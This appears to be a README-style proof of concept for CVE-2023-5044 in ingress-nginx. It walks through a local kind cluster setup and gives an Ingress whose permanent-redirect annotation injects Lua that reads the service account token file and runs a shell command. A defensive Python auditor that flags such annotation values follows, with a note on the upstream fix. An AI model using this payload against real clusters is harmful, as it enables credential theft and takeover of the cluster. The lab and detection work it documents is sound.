KubernetesBachelor / CVE-2023-5044

Poc for CVE 2023 5044

CVE-2023-5044

Prerequisites

Kind: v0.20.0

Kubectl: v1.29.3

Docker: v26.0.0

PoC

Give Docker the right permissions

sudo usermod -aG docker $USER && newgrp docker

Start the cluster with extraPortMappings and node-labels to prepare it for running an ingress

cat <<EOF | kind create cluster --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    kind: InitConfiguration
    nodeRegistration:
      kubeletExtraArgs:
        node-labels: "ingress-ready=true"
  extraPortMappings:
  - containerPort: 80
    hostPort: 80
    protocol: TCP
  - containerPort: 443
    hostPort: 443
    protocol: TCP
EOF

Install the nginx ingress controller

kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml

.yaml file to set up a simple http-echo service, without the ingress itself

kind: Pod
apiVersion: v1
metadata:
  name: foo-app
  labels:
    app: foo
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: foo-app
---
kind: Service
apiVersion: v1
metadata:
  name: foo-service
spec:
  selector:
    app: foo
  ports:
  # Default port used by the image
  - port: 8080
---
kind: Pod
apiVersion: v1
metadata:
  name: bar-app
  labels:
    app: bar
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: bar-app
---
kind: Service
apiVersion: v1
metadata:
  name: bar-service
spec:
  selector:
    app: bar
  ports:
  # Default port used by the image
  - port: 8080
---

.yaml file for the ingress with the exploit

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /$2
    nginx.ingress.kubernetes.io/permanent-redirect: https://www.google.com;}location ~* "^/exploit(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* "^/exploit(/|$)(.*)" { content_by_lua 'os.execute("touch /you")'
spec:
  rules:
  - http:
      paths:
      - pathType: Prefix
        path: /foo(/|$)(.*)
        backend:
          service:
            name: foo-service
            port:
              number: 8080
      - pathType: Prefix
        path: /bar(/|$)(.*)
        backend:
          service:
            name: bar-service
            port:
              number: 8080

"localhost/exploit" will now return the Service Account Token of the ingress-NGINX secret for the cluster.
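The ingress above works because ingress-nginx renders the `permanent-redirect` value straight into nginx.conf, so a value containing `;` and `}` terminates the intended directive and opens new `location` blocks. A defender-side check for that shape is a manifest audit that flags ingress-nginx annotation values carrying nginx block delimiters or directive names. The script below is an added example written for this page, not code from the PoC repository; the directive list and the three sample manifests (the exploit ingress from this README, a benign ingress, and a snippet annotation) are constructed for the example, and the manifests are given as dicts so it runs without a YAML library.

```python
import re

# Prefix of the ingress-nginx annotations whose values end up in nginx.conf.
ANNOTATION_PREFIX = "nginx.ingress.kubernetes.io/"

# In nginx config ';' ends a directive, '}' closes a block, '{' opens one and a
# newline separates them. A redirect URL or rewrite target never needs any of
# these, so their presence in such a value is the injection signature.
BLOCK_DELIMITERS = re.compile(r"[;{}\r\n]")

# Directive names that should never appear inside a URL-like annotation value.
# Assumption for this example: a short hand-picked list, not the controller's
# own validation rules.
SUSPICIOUS_DIRECTIVES = (
    "content_by_lua", "access_by_lua", "rewrite_by_lua",
    "location ", "proxy_pass", "include ",
)


def audit_annotations(annotations):
    """Return findings for one annotations mapping.

    Each finding is a dict with the annotation key and a list of reasons.
    *-snippet annotations are raw nginx config by design, so they are reported
    as their own class instead of being treated as injections.
    """
    findings = []
    for key, value in (annotations or {}).items():
        if not key.startswith(ANNOTATION_PREFIX):
            continue
        value = str(value)
        if key.endswith("-snippet"):
            findings.append({"annotation": key,
                             "reasons": ["snippet annotation: raw nginx config by design"]})
            continue
        reasons = []
        if BLOCK_DELIMITERS.search(value):
            reasons.append("contains nginx delimiter (; { } or newline)")
        hits = [d.strip() for d in SUSPICIOUS_DIRECTIVES if d in value.lower()]
        if hits:
            reasons.append("embeds nginx directive(s): " + ", ".join(hits))
        if reasons:
            findings.append({"annotation": key, "reasons": reasons})
    return findings


def audit_ingress(manifest):
    """Audit one Ingress manifest given as a dict (what json/yaml loading yields)."""
    if manifest.get("kind") != "Ingress":
        return []
    meta = manifest.get("metadata") or {}
    name = meta.get("name", "<unnamed>")
    return [dict(f, ingress=name) for f in audit_annotations(meta.get("annotations"))]


def audit_all(manifests):
    """Audit a list of manifests (e.g. every document of a multi-doc YAML file)."""
    return [f for m in manifests for f in audit_ingress(m)]


# Constructed sample 1: the exploit Ingress from this README, as a dict.
EXPLOIT_INGRESS = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "Ingress",
    "metadata": {
        "name": "exploit-ingress",
        "annotations": {
            "nginx.ingress.kubernetes.io/rewrite-target": "/$2",
            "nginx.ingress.kubernetes.io/permanent-redirect": r"""https://www.google.com;}location ~* "^/exploit(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* "^/exploit(/|$)(.*)" { content_by_lua 'os.execute("touch /you")'""",
        },
    },
    "spec": {"rules": [{"http": {"paths": [{"pathType": "Prefix", "path": "/foo(/|$)(.*)",
             "backend": {"service": {"name": "foo-service", "port": {"number": 8080}}}}]}}]},
}

# Constructed sample 2: the same two annotations used legitimately.
BENIGN_INGRESS = {
    "kind": "Ingress",
    "metadata": {"name": "benign-ingress", "annotations": {
        "nginx.ingress.kubernetes.io/rewrite-target": "/$2",
        "nginx.ingress.kubernetes.io/permanent-redirect": "https://example.com/new-home",
    }},
}

# Constructed sample 3: a snippet annotation, which is nginx config on purpose.
SNIPPET_INGRESS = {
    "kind": "Ingress",
    "metadata": {"name": "snippet-ingress", "annotations": {
        "nginx.ingress.kubernetes.io/configuration-snippet": 'more_set_headers "X-Frame-Options: DENY";',
    }},
}


if __name__ == "__main__":
    for finding in audit_all([EXPLOIT_INGRESS, BENIGN_INGRESS, SNIPPET_INGRESS]):
        print(f"{finding['ingress']}: {finding['annotation']}")
        for reason in finding["reasons"]:
            print("  -", reason)
```

Run against the README's manifests, only `exploit-ingress` is flagged for its `permanent-redirect` value (delimiters plus the `content_by_lua` and `location` directives); the benign ingress passes, and the snippet ingress is listed separately because snippet annotations are config by design and are better disabled cluster-wide than pattern-matched. The same check can be applied at admission time to a cluster's Ingress objects, and upstream's fix in ingress-nginx v1.9.0 added controller-side annotation validation (the `--enable-annotation-validation` flag) that rejects such values.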
